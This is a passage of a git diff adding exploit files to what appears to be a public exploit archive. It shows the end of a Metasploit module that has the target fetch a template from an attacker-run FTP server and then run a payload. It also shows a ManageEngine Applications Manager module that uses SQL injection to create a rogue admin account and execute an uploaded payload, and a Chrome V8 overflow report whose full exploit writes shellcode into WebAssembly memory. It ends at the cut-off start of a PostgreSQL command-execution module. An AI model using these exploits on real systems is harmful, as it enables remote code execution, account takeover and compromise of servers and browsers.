+      normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')
+      @command = %Q|#{normalized_java_path} -jar #{@fname}|
+    else
+      normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\bin\\java.exe')
+      @fname.gsub!(/Program Files/, 'PROGRA~1')
+      @command = %Q|cmd.exe /C "#{normalized_java_path}" -jar #{@fname}|
+    end
+
+    print_status("Attempting to upload #{@fname}")
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+
+    print_status("Attempting to execute #{@fname}")
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+  end
+
+
+  # Exploits the target in Windows platform.
+  #
+  # @return [void]
+  def exploit_as_windows
+    tmp_path = get_tmp_path
+
+    if tmp_path.blank?
+      fail_with(Failure::Unknown, 'Unable to get the temp path.')
+    end
+
+    @b64      = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
+    @fname    = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+    new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+    @fname.gsub!(/Program Files/, 'PROGRA~1')
+    new_fname.gsub!(/Program Files/, 'PROGRA~1')
+    register_files_for_cleanup(@fname, new_fname)
+
+    print_status("Attempting to upload #{@fname}")
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+
+    print_status("Attempting to copy payload to #{new_fname}")
+    get_dup_file_code(@fname, new_fname)
+
+    print_status("Attempting to execute #{new_fname}")
+    @command = new_fname
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+  end
+
+
+  # Exploits the target in Linux platform.
+  #
+  # @return [void]
+  def exploit_as_linux
+    tmp_path = get_tmp_path
+
+    if tmp_path.blank?
+      fail_with(Failure::Unknown, 'Unable to get the temp path.')
+    end
+
+    @b64      = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
+    @fname    = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))
+    new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))
+    register_files_for_cleanup(@fname, new_fname)
+
+    print_status("Attempting to upload #{@fname}")
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+
+    @command = "chmod +x #{@fname}"
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+
+    print_status("Attempting to copy payload to #{new_fname}")
+    get_dup_file_code(@fname, new_fname)
+
+    print_status("Attempting to execute #{new_fname}")
+    @command = new_fname
+    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+  end
+
+  def exploit
+    @wrap_marker = Rex::Text.rand_text_alpha(5..10)
+
+    # Start the FTP service
+    print_status("Starting the FTP server.")
+    start_service
+
+    target_platform = get_target_platform
+    if target_platform.nil?
+      fail_with(Failure::Unreachable, 'Target did not respond to OS check.  Confirm RHOSTS and RPORT, then run "check".')
+    else
+      print_status("Target being detected as: #{target_platform}")
+    end
+
+    unless target_platform_compat?(target_platform)
+      fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
+    end
+
+    case target.name.downcase
+    when /java$/
+      exploit_as_java
+    when /windows$/
+      exploit_as_windows
+    when /linux$/
+      exploit_as_linux
+    end
+  end
+
+  # Wraps request.
+  #
+  # @return [String]
+  def wrap(string)
+    "#{@wrap_marker}\n#{string}#{@wrap_marker}\n"
+  end
+
+  # Returns unwrapped response.
+  #
+  # @return [String]
+  def clear_response(string)
+    if match = string.match(/#{@wrap_marker}\n(.*)\n#{@wrap_marker}\n/m)
+      return match.captures[0]
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/46740.rb b/exploits/multiple/remote/46740.rb
new file mode 100755
index 000000000..f1ea72b9a
--- /dev/null
+++ b/exploits/multiple/remote/46740.rb
@@ -0,0 +1,313 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+ 
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine Applications Manager < 14.0 - Authentication Bypass / Remote Command Execution",
+      'Description'    => %q(
+        This module exploits sqli and command injection vulnerability in the ManageEngine AM 14 and prior versions.
+        It is completely different from the previous EDB-ID:46725 exploit.
+ 
+        Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides authentication bypass.
+        Therefore an unauthenticated user can gain the authority of "system" on the server. 
+        It uploads malicious file using the "Execute Program Action(s)" feature of the app with the new admin account.
+ 
+        Tested: Applications Manager 14 on Linux 64-bit (PostgreSQL)
+                Applications Manager 14 on Windows 10 64-bit (MSSQL)
+                Applications Manager 14 on Windows 10 64-bit (PostgreSQL)
+                Applications Manager 13 on Windows Server 2012 R2 64-bit (MSSQL)
+                Applications Manager 12 on Windows Server 2012 R2 64-bit (PostgreSQL)
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://pentest.com.tr/exploits/ManageEngine-App-Manager-14-Auth-Bypass-Remote-Command-Execution.html' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 60, # countermeasure
+          'RPORT' => 8443,
+          'SSL' => true
+        },
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Platform'       => ['unix', 'win', 'linux'],
+      'Targets' =>
+        [
+          [ 'Windows Target',
+            {
+              'Platform' => ['win'],
+              'Arch' => ARCH_CMD,
+            }
+          ],
+          [ 'Linux Target',
+            {
+              'Platform' => ['unix','linux'],
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd',
+                      'RequiredCmd' => 'generic perl ruby python',
+                    }
+                }
+            }
+          ]
+        ],
+      'DisclosureDate' => '22 April 2019',
+      'DefaultTarget'  => 1))
+ 
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of ME', '/'])
+      ],self.class)
+  end
+ 
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+ 
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def exec(action)
+    # operation of malicious file. The end of the adventure :(
+    send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'common', 'executeScript.do'),
+      'cookie'  => @cookie,
+      'vars_get' => {
+        'method' => 'testAction',
+        'actionID' => action,
+        'haid' => 'null'
+      }
+    )
+  end
+##
+# platform check
+##
+  def check_platform
+    # First touch to support of execute program ;)
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'showTile.do'),
+      'cookie'  => @cookie,
+      'vars_get' => {
+        'TileName' => '.ExecProg',
+        'haid' => 'null',
+      }
+    )
+    if res && res.code == 200 && res.body.include?('createExecProgAction')
+      # Platform can be discovered precisely using an application dir.
+      @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0] # It will be recalled later
+      if @dir =~ /:/
+        platform = Msf::Module::Platform::Windows
+      else 
+        platform = Msf::Module::Platform::Unix
+      end
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
+    end
+    file_up(platform, @dir)
+  end
+##
+# Creating and sending malicious files
+##
+  def file_up(platform, dir)
+    # specifying an extension by platform
+    if platform == Msf::Module::Platform::Windows
+      filex = ".bat"
+    else
+      if payload.encoded =~ /sh/
+        filex = ".sh"
+      elsif payload.encoded =~ /perl/
+        filex = ".pl"
+      elsif payload.encoded =~ /python/
+        filex = ".py"
+      elsif payload.encoded =~ /ruby/
+        filex = ".rb"
+      else
+        fail_with(Failure::Unknown, 'Payload type could not be checked!')
+      end
+    end
+ 
+    @fname= rand_text_alpha(9 + rand(3)) + filex
+    data = Rex::MIME::Message.new
+    data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
+ 
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => data.to_s,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'cookie' => @cookie,
+      'uri' => normalize_uri(target_uri, "Upload.do")     
+    })
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
+      print_good("#{@fname} malicious file has been uploaded.")
+      create_exec_prog(dir, @fname) # Great. Let's send them somewhere else o_O
+    else
+      fail_with(Failure::Unknown, 'The file could not be uploaded!')
+    end
+  end
+ 
+  def create_exec_prog(dir, fname)
+ 
+    @display = rand_text_alphanumeric(7)
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'adminAction.do'),
+      'cookie'  => @cookie,
+      'vars_post' => {
+        'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
+        'method' => 'createExecProgAction',
+        'id' => 0,
+        'displayname' => @display,
+        'serversite' => 'local',
+        'choosehost' => -2,
+        'abortafter' => 5, # I think it would be enough for once. But I gave 5 O_o
+        'command' => fname,
+        'execProgExecDir' => dir,
+        'cancel' => 'false'
+      }
+    )
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
+      # Find actionID simply from body res
+      actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0] 
+      print_status("Transactions completed. Attempting to get a session...")
+      exec(actionid)
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred!')
+    end
+ 
+  end
+##
+# Check all
+##
+  def check
+    # Instead of detecting the database type, we can guarantee the vuln by sending a separate query to both.
+    # The platform can be linux and possible remotely connected to the MSSQL database. 
+    # In the same way platform can be windows and postgresql can be used. 
+    # Thats why we are sending two queries. We will check the platform inside.
+    @uname = Rex::Text.rand_text_alpha_lower(6)
+    uid = rand_text_numeric(3)
+    apk = rand_text_numeric(6) 
+    @pwd = rand_text_alphanumeric(8+rand(9))
+    # MSSQL injection should be prepared with ASCII characters. 
+    # Map and join can be used for this.
+    @uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)" # "ADMIN" CHARs - should not be random
+    # PostgreSQL injection query // no need APIKEY
+    pg_user ="" 
+    pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
+    pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
+    pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
+    # MSSQL injection query
+    ms_user =""
+    ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
+    ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
+    ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
+    # Send SQL queries to both types of database(PostreSQL,MSSQL) with SQLi vuln..
+    use_sqli(ms_user, pg_user)
+ 
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+    )
+    # If the user we sent with queries was created, the login will be successful with new admin user.
+    if res && res.code == 200 && res.body.include?('.loginDiv') # css control makes more sense. The application language may not be English.
+      @cookie = res.get_cookies
+      res = send_request_cgi(
+        'method'  => 'POST',
+        'uri'     =>  normalize_uri(target_uri.path, 'j_security_check'),
+        'cookie'  => @cookie,
+        'vars_post' => {
+          'clienttype' => 'html',
+          'j_username' => @uname,
+          'j_password' => @pwd
+        }
+      )
+ 
+      if res && res.code == 302 && res.body.include?('Redirecting to')
+        res = send_request_cgi(
+          'method'  => 'GET',
+          'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+          'cookie'  => @cookie
+          )
+        @cookie = res.get_cookies # last cookie
+        return Exploit::CheckCode::Vulnerable
+      else
+        return Exploit::CheckCode::Safe
+      end
+    else
+      return Exploit::CheckCode::Safe
+    end
+    
+  end
+ 
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    print_good("Excellent! Logged in as #{@uname}")
+    print_status("Admin Username => #{@uname}")
+    print_status("Admin Password => #{@pwd}")
+    check_platform # Start the adventure
+  end
+##
+# Communication with the database
+##
+  def use_sqli(mssql, postgresql)
+    # two different post data must be sent.
+    # Because the query structures are different.
+    send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
+      'vars_post' => {
+        'resourceid' => mssql
+      }
+    )
+    # important to send the +/$ characters clear
+    send_request_cgi(
+      {
+      'method' => 'POST',
+      'ctype'  => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
+      'data' => "resourceid=#{postgresql}"
+      }, 25)
+ 
+  end
+end
+##
+# The end of the codes (o_O) // AkkuS
+##
\ No newline at end of file
diff --git a/exploits/multiple/remote/46748.txt b/exploits/multiple/remote/46748.txt
new file mode 100644
index 000000000..de6f336ef
--- /dev/null
+++ b/exploits/multiple/remote/46748.txt
@@ -0,0 +1,402 @@
+VULNERABILITY DETAILS
+https://cs.chromium.org/chromium/src/v8/src/heap/factory.cc?rcl=dd689541d3815d64b4b39f6a41603248c71aa00e&l=496
+Handle<FixedArrayBase> Factory::NewFixedDoubleArray(int length,
+                                                    PretenureFlag pretenure) {
+  DCHECK_LE(0, length);
+  if (length == 0) return empty_fixed_array();
+  if (length > FixedDoubleArray::kMaxLength) { // ***1***
+    isolate()->heap()->FatalProcessOutOfMemory("invalid array length");
+  }
+  int size = FixedDoubleArray::SizeFor(length); // ***2***
+  Map map = *fixed_double_array_map();
+  HeapObject result =
+      AllocateRawWithImmortalMap(size, pretenure, map, kDoubleAligned);
+  Handle<FixedDoubleArray> array(FixedDoubleArray::cast(result), isolate());
+  array->set_length(length);
+  return array;
+}
+
+https://cs.chromium.org/chromium/src/v8/src/builtins/builtins-array.cc?rcl=933508f981a984b7868d70c3adb781783e5aa32d&l=1183
+Object Slow_ArrayConcat(BuiltinArguments* args, Handle<Object> species,
+                        Isolate* isolate) {
+[...]
+  uint32_t estimate_result_length = 0;
+  uint32_t estimate_nof = 0;
+  FOR_WITH_HANDLE_SCOPE(isolate, int, i = 0, i, i < argument_count, i++, {
+    Handle<Object> obj = args->at(i);
+    uint32_t length_estimate;
+    uint32_t element_estimate;
+    if (obj->IsJSArray()) {
+      Handle<JSArray> array(Handle<JSArray>::cast(obj));
+      length_estimate = static_cast<uint32_t>(array->length()->Number());
+      if (length_estimate != 0) {
+        ElementsKind array_kind =
+            GetPackedElementsKind(array->GetElementsKind());
+        kind = GetMoreGeneralElementsKind(kind, array_kind);
+      }
+      element_estimate = EstimateElementCount(isolate, array);
+    } else {
+[...]
+    }
+    // Avoid overflows by capping at kMaxElementCount.
+    if (JSObject::kMaxElementCount - estimate_result_length < length_estimate) { // ***3***
+      estimate_result_length = JSObject::kMaxElementCount;
+    } else {
+      estimate_result_length += length_estimate;
+    }
+    if (JSObject::kMaxElementCount - estimate_nof < element_estimate) {
+      estimate_nof = JSObject::kMaxElementCount;
+    } else {
+      estimate_nof += element_estimate;
+    }
+  });
+
+  // If estimated number of elements is more than half of length, a
+  // fixed array (fast case) is more time and space-efficient than a
+  // dictionary.
+  bool fast_case = is_array_species &&
+                   (estimate_nof * 2) >= estimate_result_length &&
+                   isolate->IsIsConcatSpreadableLookupChainIntact(); // ***4***
+
+  if (fast_case && kind == PACKED_DOUBLE_ELEMENTS) {
+    Handle<FixedArrayBase> storage =
+        isolate->factory()->NewFixedDoubleArray(estimate_result_length); // ***5***
+[...]
+
+https://cs.chromium.org/chromium/src/v8/src/builtins/builtins-array.cc?rcl=9ea32aab5b494eaaf27ced51a6608e8400a3c4e5&l=1378
+MaybeHandle<JSArray> Fast_ArrayConcat(Isolate* isolate,
+                                      BuiltinArguments* args) {
+[...]
+  int result_len = 0;
+  {
+    DisallowHeapAllocation no_gc;
+    // Iterate through all the arguments performing checks
+    // and calculating total length.
+    for (int i = 0; i < n_arguments; i++) {
+      Object arg = (*args)[i];
+      if (!arg->IsJSArray()) return MaybeHandle<JSArray>();
+      if (!HasOnlySimpleReceiverElements(isolate, JSObject::cast(arg))) {
+        return MaybeHandle<JSArray>();
+      }
+      // TODO(cbruni): support fast concatenation of DICTIONARY_ELEMENTS.
+      if (!JSObject::cast(arg)->HasFastElements()) {
+        return MaybeHandle<JSArray>();
+      }
+      Handle<JSArray> array(JSArray::cast(arg), isolate);
+      if (!IsSimpleArray(isolate, array)) { // ***6***
+        return MaybeHandle<JSArray>();
+      }
+      // The Array length is guaranted to be <= kHalfOfMaxInt thus we won't
+      // overflow.
+      result_len += Smi::ToInt(array->length());
+      DCHECK_GE(result_len, 0);
+      // Throw an Error if we overflow the FixedArray limits
+      if (FixedDoubleArray::kMaxLength < result_len || /// ***7***
+          FixedArray::kMaxLength < result_len) {
+        AllowHeapAllocation gc;
+        THROW_NEW_ERROR(isolate,
+                        NewRangeError(MessageTemplate::kInvalidArrayLength),
+                        JSArray);
+      }
+    }
+  }
+  return ElementsAccessor::Concat(isolate, args, n_arguments, result_len);
+}
+
+https://cs.chromium.org/chromium/src/v8/src/builtins/builtins-array.cc?rcl=9ea32aab5b494eaaf27ced51a6608e8400a3c4e5&l=244
+BUILTIN(ArrayPrototypeFill) {
+[...]
+  // 2. Let len be ? ToLength(? Get(O, "length")).
+  double length;
+  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+      isolate, length, GetLengthProperty(isolate, receiver)); // ***8***
+
+  // 3. Let relativeStart be ? ToInteger(start).
+  // 4. If relativeStart < 0, let k be max((len + relativeStart), 0);
+  //    else let k be min(relativeStart, len).
+  Handle<Object> start = args.atOrUndefined(isolate, 2);
+
+  double start_index;
+  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+      isolate, start_index, GetRelativeIndex(isolate, length, start, 0)); // ***9***
+
+  // 5. If end is undefined, let relativeEnd be len;
+  //    else let relativeEnd be ? ToInteger(end).
+  // 6. If relativeEnd < 0, let final be max((len + relativeEnd), 0);
+  //    else let final be min(relativeEnd, len).
+  Handle<Object> end = args.atOrUndefined(isolate, 3);
+
+  double end_index;
+  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+      isolate, end_index, GetRelativeIndex(isolate, length, end, length));
+[...]
+  if (TryFastArrayFill(isolate, &args, receiver, value, start_index,
+                       end_index)) {
+
+https://cs.chromium.org/chromium/src/v8/src/elements.cc?rcl=d8b0d88de4b7d73ea02abb8511c146944d6ccf67&l=2244
+static Object FillImpl(Handle<JSObject> receiver, Handle<Object> obj_value,
+                       uint32_t start, uint32_t end) {
+  // Ensure indexes are within array bounds
+  DCHECK_LE(0, start);
+  DCHECK_LE(start, end);
+
+  // Make sure COW arrays are copied.
+  if (IsSmiOrObjectElementsKind(Subclass::kind())) {
+    JSObject::EnsureWritableFastElements(receiver);
+  }
+
+  // Make sure we have enough space.
+  uint32_t capacity =
+      Subclass::GetCapacityImpl(*receiver, receiver->elements());
+  if (end > capacity) {
+    Subclass::GrowCapacityAndConvertImpl(receiver, end); // ***10***
+    CHECK_EQ(Subclass::kind(), receiver->GetElementsKind());
+  }
+
+|NewFixedDoubleArray| doesn't expect the |length| argument to be negative (there's even a DCHECK for
+that), as it would pass the maximum length check[1] and cause an integer overflow when computing the
+size of the backing store[2]. The undersized backing store then might be used for out-of-bounds 
+access. It turns out there are at least two methods that allow passing negative values to
+|NewFixedDoubleArray|.
+
+
+1. Concat
+
+The implementation of |Array.prototype.concat| in V8 has quite a few fast code paths that deal with
+different kinds of arguments. The structure roughly looks like:
+
+                     +------------------+
+                     |                  |
+      +--------------> Fast_ArrayConcat |
+      |              |                  |
+      |              +------------------+      ***********************
++-------------+                                *                     *
+|             |               +----------------> packed double array *
+| ArrayConcat |               |                *                     *
+|             |               |                ***********************
++-------------+               |
+      |              +------------------+                                    +---------------------+
+      |              |                  |                                    |                     |
+      +--------------> Slow_ArrayConcat |                 +------------------> fixed array storage |
+                     |                  |                 |                  |                     |
+                     +------------------+                 |                  +---------------------+
+                              |                           |
+                              |                +---------------------+       +---------------------+
+                              |                |                     |       |                     |
+                              +----------------> ArrayConcatVisitor  +-------> dictionary storage  |
+                                               |                     |       |                     |
+                                               +---------------------+       +---------------------+
+                                                          |
+                                                          |                  +---------------------+
+                                                          |                  |                     |
+                                                          +------------------> JSReceiver storage  |
+                                                                             |                     |
+                                                                             +---------------------+
+
+The relevant code path for this issue is the packed double array case inside |Slow_ArrayConcat|.
+The method uses an unsigned variable for computing the result array length and caps it at
+|kMaxElementCount|[3], i.e., at 0xffffffff. Then the value of the variable gets converted to a
+*signed* type and passed to |NewFixedDoubleArray|[5] provided that the |fast_case| condition is
+satisfied[4], and the estimated array type is PACKED_DOUBLE. Thus, any value in the range
+[0x80000000, 0xffffffff] could pass the length check and trigger the overflow.
+
+That still means an attacker has to make the method iterate through more than two billion array
+elements, which might seem implausible; actually, the whole process takes just a couple of seconds
+on a modern machine and has moderate memory requirements because multiple arguments can refer to the
+same array.
+
+Also, |ArrayConcat| calls |Fast_ArrayConcat| in the beginning, and the fast method has a more strict
+length check, which might throw an error when the result length is more than |FixedDoubleArray::
+kMaxLength|[7]. So, the attacker has to make |Fast_ArrayConcat| return early without triggering the
+error. The easiest way to achieve that is to define an additional property on the array.
+
+REPRODUCTION CASE:
+<script>
+const MB = 1024 * 1024,
+      block_size = 32 * MB;
+array = Array(block_size).fill(1.1);
+array.prop = 1;
+args = Array(2048 * MB / block_size - 2).fill(array);
+args.push(Array(block_size));
+array.concat.apply(array, args);
+</script>
+
+
+2. Fill
+
+The bug in |concat| allows writing data beyond the bounds of an array, but it's difficult to limit
+the size of the OOB data to a sane value, which makes the exploitation primitive less useful.
+So, I've spent some time looking for variants of the issue, and found one in |Array.prototype.fill|.
+
+|ArrayPrototypeFill| initially obtains the length of an array[8] and uses that value to limit the
+|start| and |end| arguments. However, a later call to |GetRelativeIndex|[9] might trigger a
+user-defined JS function, which could modify the length. Usually, that's enough to cause OOB
+access, so |FastElementsAccessor::FillImpl| double-checks that the capacity of the array is not less
+than |end| and might call |GrowCapacityAndConvertImpl|[10], which in turn might call
+|NewFixedDoubleArray|. The issue here is that there's no check that |end| is small enough to fit in
+a signed type; therefore the same overflow leading to the allocation of an undersized backing store
+could occur.
+
+REPRODUCTION CASE:
+<script>
+array = [];
+array.length = 0xffffffff;
+
+b = array.fill(1.1, 0, {valueOf() {
+  array.length = 32;
+  array.fill(1.1);
+  return 0x80000000;
+}});
+</script>
+
+
+Exploitation:
+Unlike |concat|, |fill| conveniently allows limiting the size of the OOB block by modifying the
+|start| argument. The exploit forces the method to return an array whose length value is bigger than
+the actual size of the backing store, which is essentially a ready-to-use OOB read/write
+exploitation primitive. The rest is just copied from https://crbug.com/931640.
+
+<script>
+let data_view = new DataView(new ArrayBuffer(8));
+reverseDword = dword => {
+  data_view.setUint32(0, dword, true);
+  return data_view.getUint32(0, false);
+}
+
+reverseQword = qword => {
+  data_view.setBigUint64(0, qword, true);
+  return data_view.getBigUint64(0, false);
+}
+
+floatAsQword = float => {
+  data_view.setFloat64(0, float);
+  return data_view.getBigUint64(0);
+}
+
+qwordAsFloat = qword => {
+  data_view.setBigUint64(0, qword);
+  return data_view.getFloat64(0);
+}
+
+let oob_access_array;
+let ptr_leak_object;
+let arbirary_access_array;
+let ptr_leak_index;
+let external_ptr_index;
+let external_ptr_backup;
+const MARKER = 0x31337;
+
+leakPtr = obj => {
+  ptr_leak_object[0] = obj;
+  return floatAsQword(oob_access_array[ptr_leak_index]);
+}
+
+getQword = address => {
+  oob_access_array[external_ptr_index] = qwordAsFloat(address);
+  return arbirary_access_array[0];
+  oob_access_array[external_ptr_index] = external_ptr_backup;
+}
+
+setQword = (address, value) => {
+  oob_access_array[external_ptr_index] = qwordAsFloat(address);
+  arbirary_access_array[0] = value;
+  oob_access_array[external_ptr_index] = external_ptr_backup;
+}
+
+getField = (object_ptr, num, tagged = true) =>
+  object_ptr + BigInt(num * 8 - (tagged ? 1 : 0));
+
+setBytes = (address, array) => {
+  for (let i = 0; i < array.length; ++i) {
+    setQword(address + BigInt(i), BigInt(array[i]));
+  }
+}
+
+triggerOob = () => {
+  array = [];
+  array.length = 0xffffffff;
+  ptr_leak_object = {};
+  arbirary_access_array = new BigUint64Array(1);
+
+  oob_access_array = array.fill(1.1, 0x80000000 - 1, {valueOf() {
+    array.length = 32;
+    array.fill(1.1);
+    return 0x80000000;
+  }});
+  ptr_leak_object[0] = MARKER;
+  arbirary_access_array.buffer;
+}
+
+findOffsets = () => {
+  let markerAsFloat = qwordAsFloat(BigInt(MARKER) << 32n);
+  for (ptr_leak_index = 0; ptr_leak_index < oob_access_array.length;
+      ++ptr_leak_index) {
+    if (oob_access_array[ptr_leak_index] === markerAsFloat) {
+      break;
+    }
+  }
+
+  let oneAsFloat = qwordAsFloat(1n << 32n);
+  for (external_ptr_index = 2; external_ptr_index < oob_access_array.length;
+      ++external_ptr_index) {
+    if (oob_access_array[external_ptr_index - 2] === oneAsFloat &&
+        oob_access_array[external_ptr_index - 1] === 0) {
+      break;
+    }
+  }
+
+  if (ptr_leak_index === oob_access_array.length ||
+      external_ptr_index === oob_access_array.length) {
+    throw alert("Couldn't locate the offsets");
+  }
+
+  external_ptr_backup = oob_access_array[external_ptr_index];
+}
+
+runCalc = () => {
+  const wasm_code = new Uint8Array([
+    0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
+    0x01, 0x85, 0x80, 0x80, 0x80, 0x00, 0x01, 0x60,
+    0x00, 0x01, 0x7f, 0x03, 0x82, 0x80, 0x80, 0x80,
+    0x00, 0x01, 0x00, 0x06, 0x81, 0x80, 0x80, 0x80,
+    0x00, 0x00, 0x07, 0x85, 0x80, 0x80, 0x80, 0x00,
+    0x01, 0x01, 0x61, 0x00, 0x00, 0x0a, 0x8a, 0x80,
+    0x80, 0x80, 0x00, 0x01, 0x84, 0x80, 0x80, 0x80,
+    0x00, 0x00, 0x41, 0x00, 0x0b
+  ]);
+  const wasm_instance = new WebAssembly.Instance(
+    new WebAssembly.Module(wasm_code));
+  const wasm_func = wasm_instance.exports.a;
+
+  const shellcode = [
+    0x48, 0x31, 0xf6, 0x56, 0x48, 0x8d, 0x3d, 0x32,
+    0x00, 0x00, 0x00, 0x57, 0x48, 0x89, 0xe2, 0x56,
+    0x48, 0x8d, 0x3d, 0x0c, 0x00, 0x00, 0x00, 0x57,
+    0x48, 0x89, 0xe6, 0xb8, 0x3b, 0x00, 0x00, 0x00,
+    0x0f, 0x05, 0xcc, 0x2f, 0x75, 0x73, 0x72, 0x2f,
+    0x62, 0x69, 0x6e, 0x2f, 0x67, 0x6e, 0x6f, 0x6d,
+    0x65, 0x2d, 0x63, 0x61, 0x6c, 0x63, 0x75, 0x6c,
+    0x61, 0x74, 0x6f, 0x72, 0x00, 0x44, 0x49, 0x53,
+    0x50, 0x4c, 0x41, 0x59, 0x3d, 0x3a, 0x30, 0x00
+  ];
+
+  wasm_instance_ptr = leakPtr(wasm_instance);
+  const jump_table = getQword(getField(wasm_instance_ptr, 33));
+
+  setBytes(jump_table, shellcode);
+  wasm_func();
+}
+
+triggerOob();
+findOffsets();
+runCalc();
+</script>
+
+
+VERSION
+Google Chrome 72.0.3626.121 (Official Build) (64-bit)
+Google Chrome 74.0.3725.0 (Official Build) canary
+
+
+I'd recommend changing |NewFixedDoubleArray| so it throws an OOM error on negative values, the same
+way as the similar |AllocateRawFixedArray| function currently does.
\ No newline at end of file
diff --git a/exploits/multiple/remote/46813.rb b/exploits/multiple/remote/46813.rb
new file mode 100755
index 000000000..23f9342f8
--- /dev/null
+++ b/exploits/multiple/remote/46813.rb
@@ -0,0 +1,250 @@
+\##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/postgres'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Postgres
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'PostgreSQL COPY FROM PROGRAM Command Execution',
+      'Description' => %q(
